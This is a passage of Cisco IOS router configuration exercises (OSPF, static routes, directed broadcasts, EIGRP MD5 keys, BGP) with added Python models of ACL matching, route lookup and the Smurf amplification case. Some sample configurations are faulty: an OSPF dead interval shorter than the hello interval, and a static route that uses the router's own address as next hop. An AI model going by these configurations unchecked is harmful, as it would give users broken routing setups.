A.B.C.D IP address to match
(config-router)#area 0 range 192.168.64.0 ?
A.B.C.D IP mask for address
(config-router)#area 0 range 192.168.64.0 255.255.255.0
(config-router)# exit
(config)# int e0
(config-if)# ip address 211.79.215.7 255.255.255.0
(config-if)# ip ospf ?
authentication
Enable authentication
authentication-key
Authentication password (key)
cost
Interface cost
database-filter
Filter OSPF LSA during synchronization and flooding
dead-interval
Interval after which a neighbor is declared dead
demand-circuit
OSPF demand circuit
hello-interval
Time between HELLO packets
message-digest-key
Message digest authentication password (key)
mtu-ignore
Ignores the MTU in DBD packets
network
Network type
priority
Router priority
retransmit-interval Time between retransmitting lost link state
advertisements
transmit-delay
Link state transmit delay
(config-if)# ip ospf hello-interval ?
<1-65535> Seconds
(config-if)# ip ospf hello-interval 26
(config-if)# ip ospf dead-interval 9
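
Both the extended ACL `tennessee` earlier on this page and the OSPF `network` statements in Challenge 35 use an `address wildcard` pair, and IOS interprets the wildcard the same way in both places: a 0 bit must match, a 1 bit is ignored. The Python below is an added example, not NetworkSims code, that implements that matching and a first-match ACL evaluation with the implicit deny. Two caveats it makes visible: an extended ACL takes a wildcard, so the masks written as 255.255.255.0 in the `tennessee` entries match on the last octet only (the block also carries a copy with 0.0.0.255, the assumed intent), and E0's address 211.79.215.7 is not covered by `network 211.79.208.0 0.0.0.255`. The `PORT_NAMES` table is a partial assumption of IOS port keywords.

```python
"""Added example: wildcard-mask matching for IOS extended ACLs and OSPF
network statements, with first-match ACL evaluation."""
import ipaddress

PORT_NAMES = {"telnet": 23, "ssh": 22, "www": 80}  # assumed subset of IOS keywords


def _ip(s):
    return int(ipaddress.IPv4Address(s))


def mask_to_wildcard(mask):
    """Subnet mask -> equivalent IOS wildcard (bitwise inverse)."""
    return str(ipaddress.IPv4Address(~_ip(mask) & 0xFFFFFFFF))


def wildcard_match(addr, base, wildcard):
    """True if addr agrees with base on every bit the wildcard marks as 0."""
    care = ~_ip(wildcard) & 0xFFFFFFFF
    return (_ip(addr) & care) == (_ip(base) & care)


def ospf_network_covers(iface_addr, network, wildcard):
    """An interface joins the OSPF process only if its address matches one of
    the process's `network <net> <wildcard> area <n>` statements."""
    return wildcard_match(iface_addr, network, wildcard)


def parse_ace(line):
    """Parse `{permit|deny} <proto> <src> <dst> [eq <port>]` where <src>/<dst>
    is `host A.B.C.D`, `any`, or `A.B.C.D W.W.W.W` (address and wildcard)."""
    tok = line.split()
    action, proto, pos = tok[0], tok[1], 2
    ends = []
    for _ in range(2):
        if tok[pos] == "host":
            ends.append((tok[pos + 1], "0.0.0.0"))
            pos += 2
        elif tok[pos] == "any":
            ends.append(("0.0.0.0", "255.255.255.255"))
            pos += 1
        else:
            ends.append((tok[pos], tok[pos + 1]))
            pos += 2
    port = None
    if pos < len(tok) and tok[pos] == "eq":
        port = int(PORT_NAMES.get(tok[pos + 1], tok[pos + 1]))
    return {"action": action, "proto": proto,
            "src": ends[0], "dst": ends[1], "port": port}


def acl_decision(aces, proto, src, dst, dport):
    """First matching entry wins; no match means the implicit deny."""
    for a in aces:
        if a["proto"] not in (proto, "ip"):
            continue
        if not wildcard_match(src, *a["src"]):
            continue
        if not wildcard_match(dst, *a["dst"]):
            continue
        if a["port"] is not None and a["port"] != dport:
            continue
        return a["action"]
    return "deny"


# The `ip access-list extended tennessee` entries as typed on the page.
TENNESSEE_AS_TYPED = [parse_ace(l) for l in (
    "deny tcp host 198.89.74.1 host 208.177.41.6 eq telnet",
    "permit tcp host 205.198.245.6 host 202.226.135.3 eq telnet",
    "deny tcp 54.83.187.0 255.255.255.0 101.167.107.0 255.255.255.0 eq telnet",
    "permit tcp 56.248.48.0 255.255.255.0 138.236.218.0 255.255.255.0 eq telnet",
)]

# Assumed intent: /24 networks, which in wildcard form is 0.0.0.255.
TENNESSEE_INTENDED = [parse_ace(l) for l in (
    "deny tcp host 198.89.74.1 host 208.177.41.6 eq telnet",
    "permit tcp host 205.198.245.6 host 202.226.135.3 eq telnet",
    "deny tcp 54.83.187.0 0.0.0.255 101.167.107.0 0.0.0.255 eq telnet",
    "permit tcp 56.248.48.0 0.0.0.255 138.236.218.0 0.0.0.255 eq telnet",
)]

if __name__ == "__main__":
    flow = ("tcp", "56.248.48.7", "138.236.218.9", 23)
    print("as typed:", acl_decision(TENNESSEE_AS_TYPED, *flow))   # deny (implicit)
    print("intended:", acl_decision(TENNESSEE_INTENDED, *flow))   # permit
    print("E0 in OSPF:", ospf_network_covers("211.79.215.7", "211.79.208.0", "0.0.0.255"))
```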

Cisco Router Challenge 56


Outline
This challenge involves the configuration of BGP

Objectives
The objectives of this challenge are to:

Define BGP.

Example

Cisco Router Challenge 13


Outline
This challenge involves the configuration of IP unnumbered on the serial ports.

Objectives
The objectives of this challenge are to:

Setup the IP address on E0 port.


Borrow an IP address from E0 to S0.
Borrow an IP address from E0 to S1.

Example
> en
# config t
(config)# int e0
(config-if)# ip address 159.44.31.9 255.255.240.0
(config-if)# no shut
(config-if)# int s0
(config-if)# ip ?
Interface IP configuration subcommands:
access-group
Specify access control for packets
accounting
Enable IP accounting on this interface
address
Set the IP address of an interface
audit
Apply IDS audit name
auth-proxy
Apply authenticaton proxy
authentication
authentication subcommands
bandwidth-percent
Set EIGRP bandwidth limit
bgp
BGP interface commands
broadcast-address
Set the broadcast address of an interface
cef
Cisco Express Fowarding interface commands
cgmp
Enable/disable CGMP
directed-broadcast Enable forwarding of directed broadcasts
dvmrp
DVMRP interface commands
hello-interval
Configures IP-EIGRP hello interval
helper-address
Specify a destination address for UDP broadcasts
hold-time
Configures IP-EIGRP hold time
igmp
IGMP interface commands
inspect
Apply inspect name
irdp
ICMP Router Discovery Protocol
load-sharing
Style of load sharing
mask-reply
Enable sending ICMP Mask Reply messages
mrm
Configure IP Multicast Routing Monitor tester
mroute-cache
Enable switching cache for incoming multicast packets
mtu
Set IP Maximum Transmission Unit
multicast
IP multicast interface commands
nat
NAT interface commands
nhrp
NHRP interface subcommands
ospf
OSPF interface commands
pgm
PGM Reliable Transport Protocol
pim
PIM interface commands
policy
Enable policy routing
probe
Enable HP Probe support
proxy-arp
Enable proxy ARP
rarp-server
Enable RARP server for static arp entries
redirects
Enable sending ICMP Redirect messages
rip
Router Information Protocol
route-cache
Enable fast-switching cache for outgoing packets
rsvp
RSVP interface commands
rtp
RTP parameters
sap
Session Advertisement Protocol interface commands
sdr
Session Directory Protocol interface commands
security
DDN IP Security Option
split-horizon
Perform split horizon
summary-address
Perform address summarization
tcp
TCP header compression parameters
unnumbered
Enable IP processing without an explicit address
unreachables
Enable sending ICMP Unreachable messages
verify
Enable per packet validation
vrf
VPN Routing/Forwarding parameters on the interface
wccp
WCCP interface commands
(config-if)# ip unnumbered e0
(config-if)# no shut
(config-if)# int s1
(config-if)# ip unnumbered e0
(config-if)# no shut

Cisco Router Challenge 24


Outline
This challenge involves the configuration of IP directed broadcasts.

Objectives
The objectives of this challenge are to:

Setup IP directed broadcasts.

Example
> en
# config t
(config)# int e0
(config-if)# ip address 169.230.0.3 255.255.255.0
(config-if)# no shut
(config-if)# ip ?
Interface IP configuration subcommands:
access-group
Specify access control for packets
accounting
Enable IP accounting on this interface
address
Set the IP address of an interface
audit
Apply IDS audit name
auth-proxy
Apply authenticaton proxy
authentication
authentication subcommands
bandwidth-percent
Set EIGRP bandwidth limit
bgp
BGP interface commands
broadcast-address
Set the broadcast address of an interface
cef
Cisco Express Fowarding interface commands
cgmp
Enable/disable CGMP
directed-broadcast Enable forwarding of directed broadcasts
dvmrp
DVMRP interface commands
hello-interval
Configures IP-EIGRP hello interval
helper-address
Specify a destination address for UDP broadcasts
hold-time
Configures IP-EIGRP hold time
igmp
IGMP interface commands
inspect
Apply inspect name
irdp
ICMP Router Discovery Protocol
load-sharing
Style of load sharing
mask-reply
Enable sending ICMP Mask Reply messages
mrm
Configure IP Multicast Routing Monitor tester
mroute-cache
Enable switching cache for incoming multicast packets
mtu
Set IP Maximum Transmission Unit
multicast
IP multicast interface commands
nat
NAT interface commands
nhrp
NHRP interface subcommands
ospf
OSPF interface commands
pgm
PGM Reliable Transport Protocol
pim
PIM interface commands
policy
Enable policy routing
probe
Enable HP Probe support
proxy-arp
Enable proxy ARP
rarp-server
Enable RARP server for static arp entries
redirects
Enable sending ICMP Redirect messages
rip
Router Information Protocol
route-cache
Enable fast-switching cache for outgoing packets
rsvp
RSVP interface commands
rtp
RTP parameters
sap
Session Advertisement Protocol interface commands
sdr
Session Directory Protocol interface commands
security
DDN IP Security Option
split-horizon
Perform split horizon
summary-address
Perform address summarization
tcp
TCP header compression parameters
unnumbered
Enable IP processing without an explicit address
unreachables
Enable sending ICMP Unreachable messages
verify
Enable per packet validation
vrf
VPN Routing/Forwarding parameters on the interface
wccp
WCCP interface commands
(config-if)# ip directed-broadcast ?
<1-199>      A standard IP access list number
<1300-2699>  A standard IP expanded access list number
<cr>
(config-if)# ip directed-broadcast

Cisco Router Challenge 25


Outline
This challenge involves the configuration of the IP forward protocol.

Objectives
The objectives of this challenge are to:

Setup an IP forward protocol.

Example
> en
(config)# int e0
(config-if)# ip address 199.68.92.6 255.255.254.0
(config-if)# no shutdown
(config-if)# exit
(config)# no ip forward-protocol ?
nd
Sun's Network Disk protocol
sdns
Network Security Protocol
spanning-tree Use transparent bridging to flood UDP broadcasts
turbo-flood
Fast flooding of UDP broadcasts
udp
Packets to a specific UDP port
(config)# no ip forward-protocol udp ?
<0-65535>
Port number
biff
Biff (mail notification, comsat, 512)
bootpc
Bootstrap Protocol (BOOTP) client (68)
bootps
Bootstrap Protocol (BOOTP) server (67)
discard
Discard (9)
dnsix
DNSIX security protocol auditing (195)
domain
Domain Name Service (DNS, 53)
echo
Echo (7)
isakmp
Internet Security Association and Key Management Protocol (500)
mobile-ip
Mobile IP registration (434)
nameserver
IEN116 name service (obsolete, 42)
netbios-dgm NetBios datagram service (138)
netbios-ns
NetBios name service (137)
netbios-ss
NetBios session service (139)
ntp
Network Time Protocol (123)
pim-auto-rp PIM Auto-RP (496)
rip
Routing Information Protocol (router, in.routed, 520)
snmp
Simple Network Management Protocol (161)
snmptrap
SNMP Traps (162)
sunrpc
Sun Remote Procedure Call (111)
syslog
System Logger (514)
tacacs
TAC Access Control System (49)
talk
Talk (517)
tftp
Trivial File Transfer Protocol (69)
time
Time (37)
who
Who service (rwho, 513)
xdmcp
X Display Manager Control Protocol (177)
(config)# no ip forward-protocol udp syslog
(config)# no ip forward-protocol udp tacacs
(config)# no ip forward-protocol udp ntp

Cisco Router Challenge 26


Outline
This challenge involves the configuration of a static route.

Objectives
The objectives of this challenge are to:

Setup a static route.

Example
> en
# config t
(config)# int e0
(config-if)# ip address 101.189.132.9 255.255.224.0
(config-if)# no shutdown
(config-if)# exit
(config)# ip route ?
A.B.C.D Destination prefix
profile Enable IP routing table profile
vrf
Configure static route for a VPN Routing/Forwarding instance
(config)# ip route 188.240.190.0 ?
A.B.C.D Destination prefix mask
(config)# ip route 188.240.190.0 255.255.224.0 ?
(config)# ip route 188.240.190.0 255.255.224.0 101.189.132.9
(config)# ip ?
access-list
Named access-list
accounting-list
Select hosts for which IP accounting information is
kept
accounting-threshold Sets the maximum number of accounting entries
accounting-transits
Sets the maximum number of transit entries
address-pool
Specify default IP address pooling mechanism
alias
Alias an IP address to a TCP port
as-path
BGP autonomous system path filter
audit
Intrusion Detection System
auth-proxy
Authentication Proxy
bgp-community
format for BGP community
bootp
Config BOOTP services
cef
Cisco Express Forwarding
classless
Follow classless routing forwarding rules
community-list
Add a community list entry
default-gateway
Specify default gateway (if not routing IP)
default-network
Flags networks as candidates for default routes
dhcp
Configure DHCP server and relay parameters
dhcp-server
Specify address of DHCP server to use
domain-list
Domain name to complete unqualified host names.
domain-lookup
Enable IP Domain Name System hostname translation
domain-name
Define the default domain name
dvmrp
DVMRP global commands
extcommunity-list
Add a extended community list entry
finger
finger server
flow-aggregation
Configure flow aggregation
flow-cache
Configure netflow cache parameters
flow-export
Specify host/port to send flow statistics
forward-protocol
Controls forwarding of physical and directed IP broadcasts
ftp
FTP configuration commands
gratuitous-arps
Generate gratuitous ARPs for PPP/SLIP peer addresses
host
Add an entry to the ip hostname table
host-routing
Enable host-based routing (proxy ARP and redirect)
hp-host
Enable the HP proxy probe service
http
HTTP server configuration
icmp
ICMP options
inspect
Context-based Access Control Engine
local
Specify local options
mrm
Configure IP Multicast Routing Monitor test parameters
mroute
Configure static multicast routes
msdp
MSDP global commands
multicast
Global IP Multicast Commands
multicast-routing
Enable IP multicast forwarding
name-server
Specify address of name server to use
nat
NAT configuration commands
ospf
OSPF
pgm
PGM Reliable Transport Protocol
pim
PIM global commands
port-map
Port to application mapping (PAM) configuration
commands
prefix-list
Build a prefix list
radius
RADIUS configuration commands
rcmd
Rcmd commands
reflexive-list
Reflexive access list
route
Establish static routes
routing
Enable IP routing
rsvp
Configure static RSVP information
sap
Global IP Multicast SAP Commands
sdr
Global IP Multicast SDR Commands
security
Specify system wide security information
source-route
Process packets with source routing header options
subnet-zero
Allow 'subnet zero' subnets
tacacs
TACACS configuration commands
tcp
Global TCP parameters
telnet
Specify telnet options
tftp
tftp configuration commands
vrf
Configure an IP VPN Routing/Forwarding instance
wccp
Web-Cache Coordination Protocol Commands
(config)# ip default-network 73.162.96.0
(config)# ip route 0.0.0.0 0.0.0.0 101.189.132.12

Either line supplies a gateway of last resort: ip route 0.0.0.0 0.0.0.0 installs a static default route via the next hop, while ip default-network marks a classful network already present in the routing table as the candidate default.
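The following is an added example, not part of the NetworkSims material: a small Python model of how IOS validates an ip route line and then resolves a destination with a longest-prefix match, so that the /19 static route above is consulted before the 0.0.0.0/0 default. The connected interface, the route entries and the error texts are assumptions made for the example (the rejection message mirrors the IOS "% Inconsistent address and mask" error).

```python
import ipaddress

# Constructed for this example: the router's connected interface (E0 from the
# challenge) and two static routes as they would be typed after "ip route".
CONNECTED = [ipaddress.ip_interface("101.189.132.9/255.255.224.0")]  # E0
STATIC_ROUTES = [
    ("188.240.160.0", "255.255.224.0", "101.189.132.12"),
    ("0.0.0.0", "0.0.0.0", "101.189.132.12"),  # gateway of last resort
]


def parse_static_route(dest, mask, next_hop, connected=CONNECTED):
    """Validate one 'ip route DEST MASK NEXT-HOP' line before accepting it.

    Raises ValueError for the errors IOS rejects or that leave the route
    useless: a destination that is not the base address of its mask, and a
    next hop that is not another router on a directly connected subnet.
    """
    try:
        network = ipaddress.ip_network(f"{dest}/{mask}", strict=True)
    except ValueError:
        raise ValueError(f"% Inconsistent address and mask: {dest} {mask}")
    hop = ipaddress.ip_address(next_hop)
    if any(hop == iface.ip for iface in connected):
        raise ValueError(f"next hop {next_hop} is this router's own address")
    if not any(hop in iface.network for iface in connected):
        raise ValueError(f"next hop {next_hop} is not on a connected subnet")
    return network, hop


def build_table(routes=STATIC_ROUTES, connected=CONNECTED):
    """Routing table as (network, next_hop) pairs; connected routes carry no next hop.
    Sorted longest prefix first so that 0.0.0.0/0 is consulted last."""
    table = [(iface.network, None) for iface in connected]
    for dest, mask, hop in routes:
        table.append(parse_static_route(dest, mask, hop, connected))
    table.sort(key=lambda entry: entry[0].prefixlen, reverse=True)
    return table


def lookup(table, destination):
    """Longest-prefix match: the first entry of the sorted table that contains the address."""
    addr = ipaddress.ip_address(destination)
    for network, next_hop in table:
        if addr in network:
            return network, next_hop
    return None  # no route and no default route: the packet is dropped


if __name__ == "__main__":
    table = build_table()
    for dst in ("188.240.170.5", "101.189.140.1", "8.8.8.8"):
        network, hop = lookup(table, dst)
        print(f"{dst:16} -> {str(network):20} via {hop or 'connected'}")
```

Run it as a script to see the three lookups; the rejected forms (host bits set, next hop equal to the router's own address, next hop on no connected subnet) raise ValueError from parse_static_route.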

Cisco Router Challenge 27



Outline
This challenge involves the configuration of direct broadcasts.

Objectives
The objectives of this challenge are to:

Setup direct broadcasts.

Example
> en
# config t
(config)# int e0
(config-if)# ip address 169.230.0.3 255.255.255.0
(config-if)# no shut
(config-if)# ip ?
Interface IP configuration subcommands:
access-group        Specify access control for packets
accounting          Enable IP accounting on this interface
address             Set the IP address of an interface
audit               Apply IDS audit name
auth-proxy          Apply authentication proxy
authentication      authentication subcommands
bandwidth-percent   Set EIGRP bandwidth limit
bgp                 BGP interface commands
broadcast-address   Set the broadcast address of an interface
cef                 Cisco Express Forwarding interface commands
cgmp                Enable/disable CGMP
directed-broadcast  Enable forwarding of directed broadcasts
dvmrp               DVMRP interface commands
hello-interval      Configures IP-EIGRP hello interval
helper-address      Specify a destination address for UDP broadcasts
hold-time           Configures IP-EIGRP hold time
igmp                IGMP interface commands
inspect             Apply inspect name
irdp                ICMP Router Discovery Protocol
load-sharing        Style of load sharing
mask-reply          Enable sending ICMP Mask Reply messages
mrm                 Configure IP Multicast Routing Monitor tester
mroute-cache        Enable switching cache for incoming multicast packets
mtu                 Set IP Maximum Transmission Unit
multicast           IP multicast interface commands
nat                 NAT interface commands
nhrp                NHRP interface subcommands
ospf                OSPF interface commands
pgm                 PGM Reliable Transport Protocol
pim                 PIM interface commands
policy              Enable policy routing
probe               Enable HP Probe support
proxy-arp           Enable proxy ARP
rarp-server         Enable RARP server for static arp entries
redirects           Enable sending ICMP Redirect messages
rip                 Router Information Protocol
route-cache         Enable fast-switching cache for outgoing packets
rsvp                RSVP interface commands
rtp                 RTP parameters
sap                 Session Advertisement Protocol interface commands
sdr                 Session Directory Protocol interface commands
security            DDN IP Security Option
split-horizon       Perform split horizon
summary-address     Perform address summarization
tcp                 TCP header compression parameters
unnumbered          Enable IP processing without an explicit address
unreachables        Enable sending ICMP Unreachable messages
verify              Enable per packet validation
vrf                 VPN Routing/Forwarding parameters on the interface
wccp                WCCP interface commands
(config-if)# ip directed-broadcast ?
<1-199>      A standard IP access list number
<1300-2699>  A standard IP expanded access list number
<cr>
(config-if)# ip directed-broadcast

Explanation
A directed broadcast is a packet sent from another subnet to the broadcast address of a subnet attached to this router (169.230.0.255 for E0 above). Since IOS 12.0 the default on every interface is no ip directed-broadcast, because forwarding such packets turns every host on the segment into an amplifier for spoofed traffic (the Smurf attack: one echo request to the broadcast address produces a reply from each host, all aimed at the forged source). Leave it disabled unless an application genuinely needs it, and if it is required, supply the access-list argument so that only directed broadcasts from permitted sources are forwarded.
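Added example (not from the original challenge): a Python model of the router's forwarding decision for broadcast destinations, using constructed interfaces with the three possible settings of ip directed-broadcast (disabled, enabled, enabled with an access-list). It shows why a disabled interface is safe and an enabled one amplifies spoofed traffic arriving from another segment. The interface table, the addresses and the single-entry access-list model are assumptions made for the example.

```python
import ipaddress

LIMITED_BROADCAST = ipaddress.ip_address("255.255.255.255")

# Constructed interface table: name -> (address/mask, directed-broadcast policy).
#   None       = "no ip directed-broadcast" (the IOS default since 12.0)
#   "any"      = "ip directed-broadcast" with no access-list
#   a network  = "ip directed-broadcast <acl>" where the standard ACL permits
#                only that source block (modelled here as one permit entry)
INTERFACES = {
    "e0": (ipaddress.ip_interface("169.230.0.3/24"), None),
    "e1": (ipaddress.ip_interface("169.230.1.1/24"), "any"),
    "e2": (ipaddress.ip_interface("169.230.2.1/24"), ipaddress.ip_network("169.230.0.0/24")),
}


def forwarding_action(src, dst, ingress, interfaces=INTERFACES):
    """What the router does with a packet src->dst that arrived on interface `ingress`.

    Returns "receive" (addressed to the router, or a broadcast on the segment it
    arrived on), "unicast-route" (normal forwarding), "drop-directed-broadcast",
    or "flood:<interface>" when the packet is turned into a link-layer broadcast
    on another segment, which is the Smurf amplification case.
    """
    src = ipaddress.ip_address(src)
    dst = ipaddress.ip_address(dst)
    if dst == LIMITED_BROADCAST:
        return "receive"  # 255.255.255.255 is never routed; only ip helper-address relays it
    for name, (iface, policy) in interfaces.items():
        if dst == iface.ip:
            return "receive"
        if dst == iface.network.broadcast_address:
            if name == ingress:
                return "receive"  # already a broadcast on the segment it came from
            if policy is None:
                return "drop-directed-broadcast"
            if policy == "any" or src in policy:
                return f"flood:{name}"
            return "drop-directed-broadcast"  # the directed-broadcast ACL did not permit the source
    return "unicast-route"


def amplifier_segments(interfaces=INTERFACES):
    """Interfaces that will flood directed broadcasts from any source at all."""
    return sorted(name for name, (_, policy) in interfaces.items() if policy == "any")


def hardening_commands(interfaces=INTERFACES):
    """Interface commands that close the open amplifiers."""
    lines = []
    for name in amplifier_segments(interfaces):
        lines += [f"interface {name}", " no ip directed-broadcast"]
    return lines


if __name__ == "__main__":
    # A spoofed echo request carrying the victim's address, aimed at the broadcast of e1:
    print(forwarding_action("198.51.100.7", "169.230.1.255", "e0"))  # flood:e1
    print(forwarding_action("198.51.100.7", "169.230.0.255", "e1"))  # drop-directed-broadcast
    print("\n".join(hardening_commands()))
```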

Cisco Router Challenge 34


Outline
This challenge involves the configuration of advanced RIP.

Objectives
The objectives of this challenge are to:

Define RIP version.
Define RIP networks.
Define RIP reception on ports.

Example
> en
# config t
(config)# router rip
(config-router)# no auto-summary
(config-router)# version 2
(config-router)# network 199.224.25.0
(config-router)# network 205.188.16.0
(config-router)# network 10.0.0.0
(config-router)# exit
(config)# ip classless
(config)# int e0
(config-if)# ip address 199.224.25.3 255.255.255.0
(config-if)# ip rip ?
authentication  Authentication control
receive         advertisement reception
send            advertisement transmission
v2-broadcast    send ip broadcast v2 update
(config-if)# ip rip receive ?
version  version control
(config-if)# ip rip receive version ?
1     RIP version 1
2     RIP version 2
<cr>
(config-if)# ip rip receive version 2 ?
1     RIP version 1
<cr>
(config-if)# ip rip receive version 2

Cisco Router Challenge 62


Outline
This challenge involves the setup of authenticated routing protocols.

Objectives
The objectives of this challenge are to:

Define EIGRP.
Apply MD5 authentication on an interface.
Define the authentication key chain.

Example
# config t
(config)# router eigrp 142
(config-router)# network 205.118.116.0
(config-router)# int s0
(config-if)# ip address 205.118.116.6 255.255.255.224
(config-if)# ip authentication mode eigrp 142 md5
(config-if)# ip authentication key-chain eigrp 142 ann
(config-if)# exit
(config)# key chain ann
(config-keychain)# key 1
(config-keychain-key)# key-string hotel
(config-keychain-key)# exit

Explanation
The neighbour on S0 must use the same key number and key-string, otherwise no EIGRP adjacency forms. Key-strings appear in the running configuration in clear text unless service password-encryption is enabled, so a long random string is preferable to a dictionary word such as hotel. A key chain can hold several keys with accept-lifetime and send-lifetime values, which allows keys to be rotated without dropping the adjacency.
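Added example, not the page's own code: a Python model of the trust relationship that the key chain creates. The sender appends a key id and a keyed MD5 digest; the receiver looks the id up in its own chain and recomputes. The framing (4-byte key id, 16-byte digest, key padded to 16 bytes in the style of RFC 2082) and the payload are assumptions for illustration, not the EIGRP packet format; the same pattern underlies ip ospf message-digest-key in Challenge 106a. MD5 appears here only because it is what these commands use; newer IOS releases also support HMAC-SHA-256 for EIGRP (named mode) and for OSPF (key chain with a cryptographic-algorithm).

```python
import hashlib
import hmac

# Constructed key chain mirroring "key chain ann / key 1 / key-string hotel".
# A real chain would use a long random string and a second key with
# accept/send lifetimes so that keys can be rotated without dropping adjacencies.
KEY_CHAIN_ANN = {1: b"hotel"}

KEY_ID_LEN = 4    # assumption for this model; IOS key ids are 0..2147483647
DIGEST_LEN = 16   # MD5 output length


def keyed_md5(message: bytes, key: bytes) -> bytes:
    """Keyed digest in the style of RFC 2082 (RIPv2) and the IOS MD5 modes:
    MD5 over the message followed by the key padded with zeros to 16 bytes.
    The exact EIGRP/OSPF packet layout is not reproduced; only the trust model is."""
    return hashlib.md5(message + key.ljust(DIGEST_LEN, b"\x00")).digest()


def sign(message: bytes, key_id: int, chain: dict) -> bytes:
    """Sender: append the key id and the digest computed with that key."""
    return message + key_id.to_bytes(KEY_ID_LEN, "big") + keyed_md5(message, chain[key_id])


def verify(packet: bytes, chain: dict) -> bool:
    """Receiver: look the key id up in its own chain, recompute, compare in constant time."""
    if len(packet) < KEY_ID_LEN + DIGEST_LEN:
        return False
    message = packet[: -(KEY_ID_LEN + DIGEST_LEN)]
    key_id = int.from_bytes(packet[-(KEY_ID_LEN + DIGEST_LEN): -DIGEST_LEN], "big")
    digest = packet[-DIGEST_LEN:]
    key = chain.get(key_id)
    if key is None:
        return False  # neighbour uses a key id we do not have: the adjacency never forms
    return hmac.compare_digest(digest, keyed_md5(message, key))


if __name__ == "__main__":
    update = b"EIGRP AS142 update: 205.118.116.0/27"  # constructed payload
    pkt = sign(update, 1, KEY_CHAIN_ANN)
    print(verify(pkt, KEY_CHAIN_ANN))               # True
    print(verify(b"X" + pkt[1:], KEY_CHAIN_ANN))    # False: payload altered in transit
    print(verify(pkt, {1: b"hotel2"}))              # False: key-string mismatch
    print(verify(pkt, {2: b"hotel"}))               # False: key number mismatch
```

The last two cases are the two ways a misconfigured neighbour fails: same key number with a different string, or the same string under a different key number. Both look identical on the wire (no adjacency), which is why the key number is worth checking first when troubleshooting.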


Cisco Router Challenge 78


Outline
This challenge involves the configuration of BGP.
Objectives
The objectives of this challenge are to:

Define BGP.

Example
# config t
(config)# hostname leeds
leeds (config)# router bgp 172
leeds (config-router)# network 205.8.87.0
leeds (config-router)# neighbor 192.168.1.0 remote-as 100
leeds (config-router)# neighbor 192.168.1.0 update-source loopback0

The update-source command makes the session originate from the loopback address rather than from the address of the outgoing interface, so the session survives the loss of a single physical link. The neighbour must then peer with the loopback address, and because the peer is in another AS the session also needs neighbor ... ebgp-multihop, since IOS by default only accepts an eBGP peer on a directly connected subnet.

Topology
The basic topology is defined below, where AS1 is connected to E0, AS2 to S0, and AS3 to
S1.

(Figure: Neighbor1 in AS1 on e0, Neighbor2 in AS2 on s0, Neighbor3 in AS3 on s1)


Cisco Router Challenge 79


Outline
This challenge involves the configuration of BGP for advertising into networks.
Objectives
The objectives of this challenge are to:

Define BGP.

Example
# config t
(config)# hostname leeds
leeds (config)# router bgp 172
leeds (config-router)# network 205.8.87.0 ?
backdoor   Specify a BGP backdoor route
mask       Network mask
route-map  Route-map to modify the attributes
<cr>
leeds (config-router)# network 205.8.87.0 mask ?
A.B.C.D  Network mask
leeds (config-router)# network 205.8.87.0 mask 255.255.255.240
leeds (config-router)# network 25.8.87.0 mask 255.255.255.0
leeds (config-router)# network 5.8.0.0 mask 255.255.0.0

The network command only advertises a prefix that already exists in the IP routing table with exactly this address and mask. The mask must be contiguous and the address must be the base of the block (5.8.87.0 with 255.255.0.0 is rejected as inconsistent).

Topology
The basic topology is defined below, where AS1 is connected to E0, AS2 to S0, and AS3 to
S1.


(Figure: Neighbor1 in AS1 on e0, Neighbor2 in AS2 on s0, Neighbor3 in AS3 on s1)

Cisco Router Challenge 80


Outline
This challenge involves the configuration of BGP with a route-map.
Objectives
The objectives of this challenge are to:

Define an access-list for the route-map to match.
Define BGP.
Apply the route-map to BGP.

Example
# config t
(config)# access-list 1 permit 10.0.0.0 0.0.0.255
(config)# route-map test permit 10
(config-route-map)# match ip address 1
(config-route-map)# exit
(config)# router bgp 172
(config-router)# neighbor 11.11.11.11 remote-as 300
(config-router)# neighbor 11.11.11.11 route-map test out

A route-map applied as an outbound filter ends with an implicit deny: only the prefixes matched by access-list 1 (10.0.0.0/24) are advertised to 11.11.11.11, and everything else is suppressed.

Topology
The basic topology is defined below, where AS1 is connected to E0, AS2 to S0, and AS3 to
S1.

(Figure: Neighbor1 in AS1 on e0, Neighbor2 in AS2 on s0, Neighbor3 in AS3 on s1)

Cisco Router Challenge 81


Outline
This challenge involves the configuration of BGP to prevent leakage of private AS numbers
into the Internet.

Objectives
The objectives of this challenge are to:

Define BGP.
Define neighbours.
Prevent leakage of private AS numbers.

Example
# config t
(config)# router bgp 172
(config-router)# neighbor 11.11.11.11 remote-as 64512
(config-router)# neighbor 12.12.12.12 remote-as 311
(config-router)# neighbor 12.12.12.12 remove-private-as

Explanation
There are public AS numbers, assigned by the registries and globally unique, and private ones. A private AS number can be used by a site that connects to a single provider. The 16-bit private range is 64512 to 65534 (65535 is reserved), and the 32-bit private range is 4200000000 to 4294967294. Thus the following defines a private AS:
(config-router)# neighbor 11.11.11.11 remote-as 64512

Because private AS numbers are not unique, they must not be advertised to the Internet. Thus the command:
(config-router)# neighbor 12.12.12.12 remove-private-as

strips the private AS numbers from the AS path of the updates sent to 12.12.12.12. In this basic form the command only removes them when the whole path consists of private AS numbers; a path that mixes public and private numbers is sent unchanged, and the later all and replace-as options exist for that case. Providers normally also filter private AS numbers on their own side of the session.
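Added example (not from the page): a Python model of the documented remove-private-as behaviour on the AS path as it leaves this router towards the neighbour, covering the basic form, the all option and the replace-as option, plus a check for private numbers that still leak. The private ranges follow RFC 6996; the path handling is a model that assumes a plain AS_SEQUENCE.

```python
# Private AS number ranges (RFC 6996); 65535 and 4294967295 are reserved, not private.
PRIVATE_AS_16 = range(64512, 65535)
PRIVATE_AS_32 = range(4200000000, 4294967295)


def is_private_as(asn: int) -> bool:
    return asn in PRIVATE_AS_16 or asn in PRIVATE_AS_32


def outbound_as_path(as_path, local_as, mode=None):
    """AS path as an eBGP neighbour receives it, after the outbound
    remove-private-as processing and the usual prepending of the local AS.

    as_path : the stored AS_SEQUENCE, leftmost = most recently traversed AS
    mode    : None      - no remove-private-as configured, path sent unchanged
              "classic" - 'remove-private-as': strip the private numbers only
                          when every AS in the path is private
              "all"     - 'remove-private-as all': strip every private number
              "replace" - 'remove-private-as all replace-as': substitute the
                          local AS so the path length (and best-path choice) is kept
    Modelled on the documented IOS behaviour; assumes a plain AS_SEQUENCE.
    """
    if mode is None:
        stripped = list(as_path)
    elif mode == "classic":
        stripped = [] if as_path and all(is_private_as(a) for a in as_path) else list(as_path)
    elif mode == "all":
        stripped = [a for a in as_path if not is_private_as(a)]
    elif mode == "replace":
        stripped = [local_as if is_private_as(a) else a for a in as_path]
    else:
        raise ValueError(f"unknown mode {mode!r}")
    return [local_as] + stripped


def leaked_private_as(as_path):
    """Private AS numbers still visible in a path: what an Internet peer would see."""
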